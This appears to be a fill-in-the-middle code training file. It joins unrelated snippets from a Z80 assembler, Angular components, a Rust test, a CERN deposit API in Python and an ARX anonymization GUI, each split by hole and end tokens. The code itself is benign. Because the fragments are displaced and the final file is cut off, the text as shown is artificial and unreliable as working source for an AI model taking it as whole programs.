Z80_ASSEMBLER_EXCEPTION_EXPECTING_STATEMENT_LIST,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
z80_node node = z80_parser::acquire_node(statement, offset, node_factory);
for(iter = node.children().begin(); iter != node.children().end(); ++iter) {
evaluate_statement(statement, *iter, origin, token_factory,
node_factory, exit_condition);
}
TRACE_EXIT("Return Value: off: %lu, org: 0x%04x, exit: 0x%x", offset, origin, exit_condition);
}
z80_lst_t
_z80_assembler::identifier(void)
{
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
TRACE_EXIT("Return Value: 0x%x", 0);
return m_identifier_map;
}
z80_lst_t
_z80_assembler::label(void)
{
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
TRACE_EXIT("Return Value: 0x%x", 0);
return m_label_map;
}
std::string
_z80_assembler::listing(void)
{
z80_lst_t::iterator iter;
std::stringstream result;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
for(iter = m_identifier_map.begin(); iter != m_identifier_map.end();
++iter) {
result << iter->first << LISTING_SYMBOL_SEPERATOR << LISTING_TYPE_IDENTIFIER
<< LISTING_SYMBOL_SEPERATOR << iter->second << std::endl;
}
for(iter = m_label_map.begin(); iter != m_label_map.end(); ++iter) {
result << iter->first << LISTING_SYMBOL_SEPERATOR << LISTING_TYPE_LABEL
<< LISTING_SYMBOL_SEPERATOR << iter->second << std::endl;
}
TRACE_EXIT("Return Value: %s", CHECK_STR(result.str()));
return result.str();
}
void
_z80_assembler::run_assembler(
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory
)
{
size_t offset;
z80_token tok;
z80_stmt_t stmt;
bool exit_condition = false;
uint16_t origin = ORIGIN_INIT;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
m_binary.clear();
m_identifier_map.clear();
z80_parser::reset();
if(statement() == statement_begin()) {
stmt = move_next_statement();
} else {
stmt = statement();
}
while(has_next_statement()) {
offset = 0;
if(stmt.empty()) {
THROW_Z80_ASSEMBLER_EXCEPTION_MESSAGE(Z80_ASSEMBLER_EXCEPTION_EMPTY_STATEMENT,
"pos: %lu", z80_parser::position());
}
evaluate_statement(stmt, offset, origin, token_factory, node_factory,
exit_condition);
if(exit_condition) {
break;
}
stmt = move_next_statement();
}
TRACE_EXIT("Return Value: 0x%x", 0);
}
void
_z80_assembler::run_preprocessor(
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory
)
{
size_t offset;
z80_token tok;
z80_stmt_t stmt;
bool exit_condition = false;
uint16_t origin = ORIGIN_INIT;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
z80_parser::reset();
if(statement() == statement_begin()) {
stmt = move_next_statement();
} else {
stmt = statement();
}
while(has_next_statement()) {
offset = 0;
if(stmt.empty()) {
THROW_Z80_ASSEMBLER_EXCEPTION_MESSAGE(Z80_ASSEMBLER_EXCEPTION_EMPTY_STATEMENT,
"pos: %lu", z80_parser::position());
}
evaluate_preprocessor_statement(stmt, offset, origin, token_factory,
node_factory, exit_condition);
if(exit_condition) {
break;
}
stmt = move_next_statement();
}
TRACE_EXIT("Return Value: 0x%x", 0);
}
void
_z80_assembler::set(
__in const std::string &input,
__in_opt bool is_file
)
{
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
z80_assembler::clear();
z80_parser::set(input, is_file);
TRACE_EXIT("Return Value: 0x%x", 0);
}
size_t
_z80_assembler::size(void)
{
size_t result;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
result = m_binary.size();
TRACE_EXIT("Return Value: %lu", result);
return result;
}
std::string
_z80_assembler::to_string(
__in_opt bool verbose
)
{
std::stringstream result;
z80_lst_t::iterator iter;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
result << binary_as_string(m_binary, verbose);
if(!m_binary.empty()) {
result << std::endl;
}
result << "Identifier[" << m_identifier_map.size() << "]";
if(verbose) {
for(iter = m_identifier_map.begin(); iter != m_identifier_map.end();
++iter) {
result << std::endl << "--- [" << VALUE_AS_HEX(uint16_t, iter->second)
<< "] " << iter->first;
}
}
result << std::endl << "Label[" << m_label_map.size() << "]";
if(verbose) {
for(iter = m_label_map.begin(); iter != m_label_map.end();
++iter) {
result << std::endl << "--- [" << VALUE_AS_HEX(uint16_t, iter->second)
<< "] " << iter->first;
}
}
TRACE_EXIT("Return Value: %s", CHECK_STR(result.str()));
return result.str();
}
}
}<|fim▁end|> | TRACE_ENTRY(); |
<|file_name|>StudyURNFormatException.java<|end_file_name|><|fim▁begin|>package gov.va.med.imaging.exceptions;
public class StudyURNFormatException
extends URNFormatException<|fim▁hole|> {
super();
}
public StudyURNFormatException(String message)
{
super(message);
}
public StudyURNFormatException(Throwable cause)
{
super(cause);
}
public StudyURNFormatException(String message, Throwable cause)
{
super(message, cause);
}
}<|fim▁end|> | {
private static final long serialVersionUID = 6271193731031546478L;
public StudyURNFormatException() |
<|file_name|>mousewheelzoom.component.ts<|end_file_name|><|fim▁begin|>import { Component, Input, OnDestroy, OnInit } from '@angular/core';
import { interaction } from 'openlayers';
import { MapComponent } from '../map.component';<|fim▁hole|>})
export class MouseWheelZoomInteractionComponent implements OnInit, OnDestroy {
instance: interaction.MouseWheelZoom;
@Input() duration: number;
@Input() timeout: number;
@Input() useAnchor: boolean;
constructor(private map: MapComponent) {
}
ngOnInit() {
this.instance = new interaction.MouseWheelZoom(this);
this.map.instance.addInteraction(this.instance);
}
ngOnDestroy() {
this.map.instance.removeInteraction(this.instance);
}
}<|fim▁end|> |
@Component({
selector: 'aol-interaction-mousewheelzoom',
template: '' |
<|file_name|>app.component.ts<|end_file_name|><|fim▁begin|>/*
* Angular 2 decorators and services
*/
import {
Component,
OnInit,
ViewEncapsulation,
ChangeDetectionStrategy
} from '@angular/core';
import {
Event,
NavigationStart,
Router
} from '@angular/router';
import {
Store
} from '@ngrx/store';
import {
UserInfo
} from './common/entities';
/*
* App Component
* Top Level Component
*/
@Component({
selector: 'app',
encapsulation: ViewEncapsulation.None,
styles: [
require('./styles/vendors.scss'),
require('./styles/index.scss'),
require('./app.styles.scss')
],
templateUrl: './app.template.html',
changeDetection: ChangeDetectionStrategy.OnPush
})
export class AppComponent {
private isAuth: boolean;
constructor(
private router: Router,
private store: Store<UserInfo>
) {
this.store.select('auth').subscribe((res: UserInfo) => {
this.isAuth = res.isAuth;
});
router.events
.filter((event: Event) => event instanceof NavigationStart)
.subscribe((event: NavigationStart) => {
if (!this.isAuth && event.url !== '/login') {
this.router.navigate(['login']);<|fim▁hole|> });
}
}<|fim▁end|> | } |
<|file_name|>no-use.rs<|end_file_name|><|fim▁begin|>// check that reservation impls can't be used as normal impls in positive reasoning.
#![feature(rustc_attrs)]<|fim▁hole|>
fn main() {
<() as MyTrait>::foo(&());
//~^ ERROR the trait bound `(): MyTrait` is not satisfied
}<|fim▁end|> |
trait MyTrait { fn foo(&self); }
#[rustc_reservation_impl = "foo"]
impl MyTrait for () { fn foo(&self) {} } |
<|file_name|>api.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
#
# This file is part of CERN Analysis Preservation Framework.
# Copyright (C) 2016 CERN.
#
# CERN Analysis Preservation Framework is free software; you can redistribute
# it and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# CERN Analysis Preservation Framework is distributed in the hope that it will
# be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with CERN Analysis Preservation Framework; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Deposit API."""
from __future__ import absolute_import, print_function
import copy
import shutil
import tempfile
from copy import deepcopy
from functools import wraps
import requests
from celery import shared_task
from flask import current_app, request
from flask_login import current_user
from invenio_access.models import ActionRoles, ActionUsers
from invenio_db import db
from invenio_deposit.api import Deposit, index, preserve
from invenio_deposit.utils import mark_as_action
from invenio_files_rest.errors import MultipartMissingParts
from invenio_files_rest.models import Bucket, FileInstance, ObjectVersion
from invenio_jsonschemas.errors import JSONSchemaNotFound
from invenio_records.models import RecordMetadata
from invenio_records_files.models import RecordsBuckets
from invenio_rest.errors import FieldError
from jsonschema.validators import Draft4Validator, RefResolutionError
from sqlalchemy.exc import IntegrityError
from sqlalchemy.orm.exc import NoResultFound
from werkzeug.local import LocalProxy
from cap.config import FILES_URL_MAX_SIZE
from cap.modules.records.api import CAPRecord
from cap.modules.repoimporter.repo_importer import RepoImporter
from cap.modules.schemas.models import Schema
from cap.modules.user.errors import DoesNotExistInLDAP
from cap.modules.user.utils import (get_existing_or_register_role,
get_existing_or_register_user)
from .errors import (DepositValidationError, FileUploadError,
UpdateDepositPermissionsError)
from .fetchers import cap_deposit_fetcher
from .minters import cap_deposit_minter
from .permissions import (AdminDepositPermission, CloneDepositPermission,
DepositAdminActionNeed, DepositReadActionNeed,
DepositUpdateActionNeed, UpdateDepositPermission)
_datastore = LocalProxy(lambda: current_app.extensions['security'].datastore)
current_jsonschemas = LocalProxy(
lambda: current_app.extensions['invenio-jsonschemas']
)
PRESERVE_FIELDS = (
'_deposit',
'_buckets',
'_files',
'_experiment',
'_access',
'general_title',
'$schema'
)
DEPOSIT_ACTIONS = [
'deposit-read',
'deposit-update',
'deposit-admin',
]
def DEPOSIT_ACTIONS_NEEDS(id):
"""Method to construct action needs."""
return {
'deposit-read': DepositReadActionNeed(str(id)),
'deposit-update': DepositUpdateActionNeed(str(id)),
'deposit-admin': DepositAdminActionNeed(str(id))
}
EMPTY_ACCESS_OBJECT = {
action: {'users': [], 'roles': []} for action in DEPOSIT_ACTIONS
}
class CAPDeposit(Deposit):
"""Define API for changing deposit state."""
deposit_fetcher = staticmethod(cap_deposit_fetcher)
deposit_minter = staticmethod(cap_deposit_minter)
published_record_class = CAPRecord
@property
def schema(self):
"""Schema property."""
return Schema.get_by_fullpath(self['$schema'])
@property
def record_schema(self):
"""Convert deposit schema to a valid record schema."""
record_schema = self.schema.get_matching_record_schema()
return record_schema.fullpath
def pop_from_data(method, fields=None):
"""Remove fields from deposit data.
:param fields: List of fields to remove (default: ``('_deposit',)``).
"""
fields = fields or (
'_deposit',
'_access',
'_experiment',
'general_title',
'$schema'
)
@wraps(method)
def wrapper(self, *args, **kwargs):
"""Check current deposit status."""
for field in fields:
if field in args[0]:
args[0].pop(field)
return method(self, *args, **kwargs)
return wrapper
def pop_from_data_patch(method, fields=None):
"""Remove fields from deposit data.
:param fields: List of fields to remove (default: ``('_deposit',)``).
"""
fields = fields or (
'/_deposit',
'/_access',
'/_files',
'/_experiment',
'/$schema',
)
@wraps(method)
def wrapper(self, *args, **kwargs):
"""Check current deposit status."""
for field in fields:
for k, patch in enumerate(args[0]):
if field == patch.get("path", None):
del args[0][k]
return method(self, *args, **kwargs)
return wrapper
@mark_as_action
def permissions(self, pid=None):
"""Permissions action.
We expect an array of objects:
[{
"email": "",
"type": "user|egroup",
"op": "add|remove",
"action": "deposit-read|deposit-update|deposit-admin"
}]
"""
with AdminDepositPermission(self).require(403):
data = request.get_json()
return self.edit_permissions(data)
@mark_as_action
def publish(self, *args, **kwargs):
"""Simple file check before publishing."""
with AdminDepositPermission(self).require(403):
for file_ in self.files:
if file_.data['checksum'] is None:
raise MultipartMissingParts()
return super(CAPDeposit, self).publish(*args, **kwargs)
@mark_as_action
def upload(self, pid=None, *args, **kwargs):
"""Upload action for file/repository."""
with UpdateDepositPermission(self).require(403):
data = request.get_json()
fileinfo = self._construct_fileinfo(data['url'],
data['type'])
if request:
_, record = request.view_args.get('pid_value').data
record_id = str(record.id)
filename = fileinfo['filename']
obj = ObjectVersion.create(
bucket=record.files.bucket, key=filename
)
obj.file = FileInstance.create()
record.files.flush()
record.files[filename]['source_url'] = data['url']
if data['type'] == 'url':
if data['url'].startswith(
('https://github',
'https://gitlab.cern.ch',
'root://')):
download_url.delay(record_id, data['url'], fileinfo)
else:
raise FileUploadError(
'Please provide a valid file url.')
else:
if data['url'].startswith(
('https://github', 'https://gitlab.cern.ch')):
download_repo.delay(record_id, data['url'], filename)
else:
raise FileUploadError(
'Please provide a valid repository url.')
return self
@index
@mark_as_action
def clone(self, pid=None, id_=None):
"""Clone a deposit.
Adds snapshot of the files when deposit is cloned.
"""
with CloneDepositPermission(self).require(403):
data = copy.deepcopy(self.dumps())
del data['_deposit'], data['control_number']
deposit = super(CAPDeposit, self).create(data, id_=id_)
deposit['_deposit']['cloned_from'] = {
'type': pid.pid_type,
'value': pid.pid_value,
'revision_id': self.revision_id,
}
bucket = self.files.bucket.snapshot()
RecordsBuckets.create(record=deposit.model, bucket=bucket)
# optionally we might need to do: deposit.files.flush()
deposit.commit()
return deposit
@mark_as_action
def edit(self, *args, **kwargs):
"""Edit deposit."""
with UpdateDepositPermission(self).require(403):
return super(CAPDeposit, self).edit(*args, **kwargs)
@pop_from_data
def update(self, *args, **kwargs):
"""Update deposit."""
with UpdateDepositPermission(self).require(403):
super(CAPDeposit, self).update(*args, **kwargs)
@pop_from_data_patch
def patch(self, *args, **kwargs):
"""Patch deposit."""
with UpdateDepositPermission(self).require(403):
return super(CAPDeposit, self).patch(*args, **kwargs)
def edit_permissions(self, data):
"""Edit deposit permissions.
We expect an array of objects:
[{
"email": "",
"type": "user|egroup",
"op": "add|remove",
"action": "deposit-read|deposit-update|deposit-admin"
}]
"""
with db.session.begin_nested():
for obj in data:
if obj['type'] == 'user':
try:
user = get_existing_or_register_user(obj['email'])
except DoesNotExistInLDAP:
raise UpdateDepositPermissionsError(
'User with this mail does not exist in LDAP.')
if obj['op'] == 'add':
try:
self._add_user_permissions(user,
[obj['action']],
db.session)
except IntegrityError:
raise UpdateDepositPermissionsError(
'Permission already exist.')
elif obj['op'] == 'remove':
try:
self._remove_user_permissions(user,
[obj['action']],
db.session)
except NoResultFound:
raise UpdateDepositPermissionsError(
'Permission does not exist.')
elif obj['type'] == 'egroup':
try:
role = get_existing_or_register_role(obj['email'])
except DoesNotExistInLDAP:
raise UpdateDepositPermissionsError(
'Egroup with this mail does not exist in LDAP.')
if obj['op'] == 'add':
try:
self._add_egroup_permissions(role,
[obj['action']],
db.session)
except IntegrityError:
raise UpdateDepositPermissionsError(
'Permission already exist.')
elif obj['op'] == 'remove':
try:
self._remove_egroup_permissions(role,
[obj['action']],
db.session)
except NoResultFound:
raise UpdateDepositPermissionsError(
'Permission does not exist.')
self.commit()
return self
@preserve(result=False, fields=PRESERVE_FIELDS)
def clear(self, *args, **kwargs):
"""Clear only drafts."""
super(CAPDeposit, self).clear(*args, **kwargs)
def is_published(self):
"""Check if deposit is published."""
return self['_deposit'].get('pid') is not None
def get_record_metadata(self):
"""Get Record Metadata instance for deposit."""
return RecordMetadata.query.filter_by(id=self.id).one_or_none()
def commit(self, *args, **kwargs):
"""Synchronize files before commit."""
self.files.flush()
return super(CAPDeposit, self).commit(*args, **kwargs)
def _add_user_permissions(self,
user,
permissions,
session):
"""Adds permissions for user for this deposit."""
for permission in permissions:
session.add(
ActionUsers.allow(
DEPOSIT_ACTIONS_NEEDS(self.id)[permission],
user=user
)
)
session.flush()
self['_access'][permission]['users'].append(user.id)
def _remove_user_permissions(self,
user,
permissions,
session):
"""Remove permissions for user for this deposit."""
for permission in permissions:
session.delete(
ActionUsers.query.filter(
ActionUsers.action == permission,
ActionUsers.argument == str(self.id),
ActionUsers.user_id == user.id
).one()
)
session.flush()
self['_access'][permission]['users'].remove(user.id)
def _add_egroup_permissions(self,
egroup,
permissions,
session):
for permission in permissions:
session.add(
ActionRoles.allow(
DEPOSIT_ACTIONS_NEEDS(self.id)[permission],
role=egroup
)
)
session.flush()
self['_access'][permission]['roles'].append(egroup.id)
def _remove_egroup_permissions(self,
egroup,
permissions,
session):
for permission in permissions:
session.delete(
ActionRoles.query.filter(
ActionRoles.action == permission,
ActionRoles.argument == str(self.id),
ActionRoles.role_id == egroup.id
).one()
)
session.flush()
self['_access'][permission]['roles'].remove(egroup.id)
def _init_owner_permissions(self, owner=current_user):
self['_access'] = deepcopy(EMPTY_ACCESS_OBJECT)
if owner:
with db.session.begin_nested():
self._add_user_permissions(owner,
DEPOSIT_ACTIONS,
db.session)
self['_deposit']['created_by'] = owner.id
self['_deposit']['owners'] = [owner.id]
def _construct_fileinfo(self, url, type):
"""Construct repo name or file name."""
url = url.rstrip('/')
branch = None
if type == 'repo':
filename = filepath = url.split('/')[-1] + '.tar.gz'
else:
url = url.split('/blob/')[-1]
info = url.split('/')
branch = info[0]
filename = info[-1]
filepath = '/'.join(info[1:])
return {'filepath': filepath, 'filename': filename, 'branch': branch}
def _set_experiment(self):
schema = Schema.get_by_fullpath(self['$schema'])
self['_experiment'] = schema.experiment
def _create_buckets(self):
bucket = Bucket.create()
RecordsBuckets.create(record=self.model, bucket=bucket)
def validate(self, **kwargs):
"""Validate data using schema with ``JSONResolver``."""
# def _concat_deque(queue):
# """Helper for joining dequeue object."""
# result = ''
# for i in queue:
# if isinstance(i, int):
# result += '[' + str(i) + ']'
# else:
# result += '/' + i
# return result
result = {}
try:
schema = self['$schema']
if not isinstance(schema, dict):
schema = {'$ref': schema}
resolver = current_app.extensions[
'invenio-records'].ref_resolver_cls.from_schema(schema)
result['errors'] = [
FieldError(list(error.path), str(error.message))
for error in
Draft4Validator(schema, resolver=resolver).iter_errors(self)
]
if result['errors']:
raise DepositValidationError(None, errors=result['errors'])
except RefResolutionError:
raise DepositValidationError('Schema with given url not found.')
except KeyError:
raise DepositValidationError('Schema field is required.')
@classmethod
def get_record(cls, id_, with_deleted=False):
"""Get record instance."""
deposit = super(CAPDeposit, cls).get_record(
id_=id_, with_deleted=with_deleted)
deposit['_files'] = deposit.files.dumps()
return deposit
@classmethod
def create(cls, data, id_=None, owner=current_user):
"""Create a deposit.
Adds bucket creation immediately on deposit creation.
"""
data = cls._preprocess_data(data)
cls._validate_data(data)
deposit = super(CAPDeposit, cls).create(data, id_=id_)
deposit._create_buckets()
deposit._set_experiment()
deposit._init_owner_permissions(owner)
deposit.commit()
return deposit
@classmethod
def _preprocess_data(cls, data):
# data can be sent without specifying particular version of schema,
# but just with a type, e.g. cms-analysis
# this be resolved to the last version of deposit schema of this type
if '$ana_type' in data:
try:
schema = Schema.get_latest(
'deposits/records/{}'.format(data['$ana_type'])
)
except JSONSchemaNotFound:
raise DepositValidationError(
'Schema {} is not a valid deposit schema.'
.format(data['$ana_type']))
data['$schema'] = schema.fullpath
data.pop('$ana_type')
return data
@classmethod
def _validate_data(cls, data):
if not isinstance(data, dict) or data == {}:
raise DepositValidationError('Empty deposit data.')
try:
schema_fullpath = data['$schema']
except KeyError:
raise DepositValidationError('Schema not specified.')
try:
Schema.get_by_fullpath(schema_fullpath)
except (AttributeError, JSONSchemaNotFound):
raise DepositValidationError('Schema {} is not a valid option.'
.format(schema_fullpath))
@shared_task(max_retries=5)
def download_url(pid, url, fileinfo):
"""Task for fetching external files/repos."""
record = CAPDeposit.get_record(pid)
size = None
if url.startswith("root://"):
from xrootdpyfs.xrdfile import XRootDPyFile
response = XRootDPyFile(url, mode='r-')
total = response.size
else:
try:
filepath = fileinfo.get('filepath', None)
filename = fileinfo.get('filename', None)
branch = fileinfo.get('branch', None)
file = RepoImporter.create(url, branch).archive_file(filepath)
url = file.get('url', None)
size = file.get('size', None)
token = file.get('token', None)
headers = {'PRIVATE-TOKEN': token}
response = requests.get(
url, stream=True, headers=headers).raw
response.decode_content = True
total = size or int(
response.headers.get('Content-Length'))
except TypeError as exc:
download_url.retry(exc=exc, countdown=10)
task_commit(record, response, filename, total)
@shared_task(max_retries=5)
def download_repo(pid, url, filename):
"""Task for fetching external files/repos."""
record = CAPDeposit.get_record(pid)
try:
link = RepoImporter.create(url).archive_repository()
response = ensure_content_length(link)
total = int(response.headers.get('Content-Length'))
except TypeError as exc:<|fim▁hole|> download_repo.retry(exc=exc, countdown=10)
task_commit(record, response.raw, filename, total)
def task_commit(record, response, filename, total):
"""Commit file to the record."""
record.files[filename].file.set_contents(
response,
default_location=record.files.bucket.location.uri,
size=total
)
db.session.commit()
def ensure_content_length(
url, method='GET',
session=None,
max_size=FILES_URL_MAX_SIZE or 2**20,
*args, **kwargs):
"""Add Content-Length when no present."""
kwargs['stream'] = True
session = session or requests.Session()
r = session.request(method, url, *args, **kwargs)
if 'Content-Length' not in r.headers:
# stream content into a temporary file so we can get the real size
spool = tempfile.SpooledTemporaryFile(max_size)
shutil.copyfileobj(r.raw, spool)
r.headers['Content-Length'] = str(spool.tell())
spool.seek(0)
# replace the original socket with our temporary file
r.raw._fp.close()
r.raw._fp = spool
return r<|fim▁end|> | |
<|file_name|>ViewPrivacyModels.java<|end_file_name|><|fim▁begin|>/*
* ARX: Powerful Data Anonymization
* Copyright 2012 - 2021 Fabian Prasser and contributors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.deidentifier.arx.gui.view.impl.define;
import java.util.ArrayList;
import java.util.Collections;
import java.util.Comparator;
import java.util.List;
import org.deidentifier.arx.gui.Controller;
import org.deidentifier.arx.gui.model.Model;
import org.deidentifier.arx.gui.model.ModelCriterion;
import org.deidentifier.arx.gui.model.ModelEvent;
import org.deidentifier.arx.gui.model.ModelEvent.ModelPart;
import org.deidentifier.arx.gui.model.ModelBLikenessCriterion;
import org.deidentifier.arx.gui.model.ModelDDisclosurePrivacyCriterion;
import org.deidentifier.arx.gui.model.ModelExplicitCriterion;
import org.deidentifier.arx.gui.model.ModelLDiversityCriterion;
import org.deidentifier.arx.gui.model.ModelRiskBasedCriterion;
import org.deidentifier.arx.gui.model.ModelTClosenessCriterion;
import org.deidentifier.arx.gui.resources.Resources;
import org.deidentifier.arx.gui.view.SWTUtil;
import org.deidentifier.arx.gui.view.def.IView;
import org.deidentifier.arx.gui.view.impl.common.ClipboardHandlerTable;
import org.eclipse.swt.SWT;
import org.eclipse.swt.events.SelectionAdapter;
import org.eclipse.swt.events.SelectionEvent;
import org.eclipse.swt.graphics.Image;
import org.eclipse.swt.layout.GridData;
import org.eclipse.swt.widgets.Composite;
import org.eclipse.swt.widgets.TableItem;
import de.linearbits.swt.table.DynamicTable;
import de.linearbits.swt.table.DynamicTableColumn;
/**
* This class displays a list of all defined privacy criteria.
*
* @author fabian
*/
public class ViewPrivacyModels implements IView {
/** Controller */
private Controller controller;
/** Model */
private Model model = null;
/** View */
private final DynamicTable table;
/** View */
private final DynamicTableColumn column1;
/** View */
private final DynamicTableColumn column2;
/** View */
private final DynamicTableColumn column3;
/** View */
private final Composite root;
/** View */
private final Image symbolL;
/** View */
private final Image symbolT;
/** View */
private final Image symbolK;
/** View */
private final Image symbolD;
/** View */
private final Image symbolDP;
/** View */
private final Image symbolR;
/** View */
private final Image symbolG;
/** View */
private final Image symbolB;
/** View */
private final LayoutPrivacySettings layout;
/**
* Creates a new instance.
*
* @param parent
* @param controller
* @param layoutCriteria
*/
public ViewPrivacyModels(final Composite parent, final Controller controller, LayoutPrivacySettings layoutCriteria) {
// Register
this.controller = controller;
this.controller.addListener(ModelPart.CRITERION_DEFINITION, this);
this.controller.addListener(ModelPart.MODEL, this);
this.controller.addListener(ModelPart.ATTRIBUTE_TYPE, this);
<|fim▁hole|> this.layout = layoutCriteria;
this.symbolL = controller.getResources().getManagedImage("symbol_l.png"); //$NON-NLS-1$
this.symbolT = controller.getResources().getManagedImage("symbol_t.png"); //$NON-NLS-1$
this.symbolK = controller.getResources().getManagedImage("symbol_k.png"); //$NON-NLS-1$
this.symbolD = controller.getResources().getManagedImage("symbol_d.png"); //$NON-NLS-1$
this.symbolDP = controller.getResources().getManagedImage("symbol_dp.png"); //$NON-NLS-1$
this.symbolR = controller.getResources().getManagedImage("symbol_r.png"); //$NON-NLS-1$
this.symbolG = controller.getResources().getManagedImage("symbol_gt.png"); //$NON-NLS-1$
this.symbolB = controller.getResources().getManagedImage("symbol_b.png"); //$NON-NLS-1$
this.root = parent;
this.table = SWTUtil.createTableDynamic(root, SWT.SINGLE | SWT.V_SCROLL | SWT.FULL_SELECTION);
this.table.setHeaderVisible(true);
this.table.setLinesVisible(true);
GridData gd = SWTUtil.createFillHorizontallyGridData();
gd.heightHint = 100;
this.table.setLayoutData(gd);
SWTUtil.createGenericTooltip(table);
this.table.setMenu(new ClipboardHandlerTable(table).getMenu());
this.table.addSelectionListener(new SelectionAdapter(){
public void widgetSelected(SelectionEvent arg0) {
layout.updateButtons();
}
});
this.column1 = new DynamicTableColumn(table, SWT.NONE);
this.column1.setText(Resources.getMessage("ViewCriteriaList.0")); //$NON-NLS-1$
this.column1.setWidth("10%", "30px"); //$NON-NLS-1$ //$NON-NLS-2$
this.column2 = new DynamicTableColumn(table, SWT.NONE);
this.column2.setText(Resources.getMessage("CriterionSelectionDialog.2")); //$NON-NLS-1$
this.column2.setWidth("45%", "100px"); //$NON-NLS-1$ //$NON-NLS-2$
this.column3 = new DynamicTableColumn(table, SWT.NONE);
this.column3.setText(Resources.getMessage("CriterionSelectionDialog.3")); //$NON-NLS-1$
this.column3.setWidth("45%", "100px"); //$NON-NLS-1$ //$NON-NLS-2$
this.column1.pack();
this.column2.pack();
this.column3.pack();
this.layout.updateButtons();
reset();
}
/**
* Add
*/
public void actionAdd() {
controller.actionCriterionAdd();
}
/**
* Configure
*/
public void actionConfigure() {
ModelCriterion criterion = this.getSelectedCriterion();
if (criterion != null) {
controller.actionCriterionConfigure(criterion);
}
}
/**
* Pull
*/
public void actionPull() {
ModelCriterion criterion = this.getSelectedCriterion();
if (criterion != null && criterion instanceof ModelExplicitCriterion) {
controller.actionCriterionPull(criterion);
}
}
/**
* Push
*/
public void actionPush() {
ModelCriterion criterion = this.getSelectedCriterion();
if (criterion != null && criterion instanceof ModelExplicitCriterion) {
controller.actionCriterionPush(criterion);
}
}
/**
* Remove
*/
public void actionRemove() {
ModelCriterion criterion = this.getSelectedCriterion();
if (criterion != null) {
controller.actionCriterionEnable(criterion);
}
}
@Override
public void dispose() {
this.controller.removeListener(this);
}
/**
* Returns the currently selected criterion, if any
* @return
*/
public ModelCriterion getSelectedCriterion() {
if (table.getSelection() == null || table.getSelection().length == 0) {
return null;
}
return (ModelCriterion)table.getSelection()[0].getData();
}
/**
* May criteria be added
* @return
*/
public boolean isAddEnabled() {
return model != null && model.getInputDefinition() != null &&
model.getInputDefinition().getQuasiIdentifyingAttributes() != null;
}
@Override
public void reset() {
root.setRedraw(false);
if (table != null) {
table.removeAll();
}
root.setRedraw(true);
SWTUtil.disable(root);
}
@Override
public void update(ModelEvent event) {
// Model update
if (event.part == ModelPart.MODEL) {
this.model = (Model)event.data;
}
// Other updates
if (event.part == ModelPart.CRITERION_DEFINITION ||
event.part == ModelPart.ATTRIBUTE_TYPE ||
event.part == ModelPart.ATTRIBUTE_TYPE_BULK_UPDATE ||
event.part == ModelPart.MODEL) {
// Update table
if (model!=null) {
updateTable();
}
}
}
/**
* Update table
*/
private void updateTable() {
root.setRedraw(false);
table.removeAll();
if (model.getDifferentialPrivacyModel().isEnabled()) {
TableItem item = new TableItem(table, SWT.NONE);
item.setText(new String[] { "", model.getDifferentialPrivacyModel().toString(), "" }); //$NON-NLS-1$ //$NON-NLS-2$
item.setImage(0, symbolDP);
item.setData(model.getDifferentialPrivacyModel());
}
if (model.getKAnonymityModel().isEnabled()) {
TableItem item = new TableItem(table, SWT.NONE);
item.setText(new String[] { "", model.getKAnonymityModel().toString(), "" }); //$NON-NLS-1$ //$NON-NLS-2$
item.setImage(0, symbolK);
item.setData(model.getKAnonymityModel());
}
if (model.getKMapModel().isEnabled()) {
TableItem item = new TableItem(table, SWT.NONE);
item.setText(new String[] { "", model.getKMapModel().toString(), "" }); //$NON-NLS-1$ //$NON-NLS-2$
item.setImage(0, symbolK);
item.setData(model.getKMapModel());
}
if (model.getDPresenceModel().isEnabled()) {
TableItem item = new TableItem(table, SWT.NONE);
item.setText(new String[] { "", model.getDPresenceModel().toString(), "" }); //$NON-NLS-1$ //$NON-NLS-2$
item.setImage(0, symbolD);
item.setData(model.getDPresenceModel());
}
if (model.getStackelbergModel().isEnabled()) {
TableItem item = new TableItem(table, SWT.NONE);
item.setText(new String[] { "", model.getStackelbergModel().toString(), ""});
item.setImage(0, symbolG);
item.setData(model.getStackelbergModel());
}
List<ModelExplicitCriterion> explicit = new ArrayList<ModelExplicitCriterion>();
for (ModelLDiversityCriterion other : model.getLDiversityModel().values()) {
if (other.isEnabled()) {
explicit.add(other);
}
}
for (ModelTClosenessCriterion other : model.getTClosenessModel().values()) {
if (other.isEnabled()) {
explicit.add(other);
}
}
for (ModelDDisclosurePrivacyCriterion other : model.getDDisclosurePrivacyModel().values()) {
if (other.isEnabled()) {
explicit.add(other);
}
}
for (ModelBLikenessCriterion other : model.getBLikenessModel().values()) {
if (other.isEnabled()) {
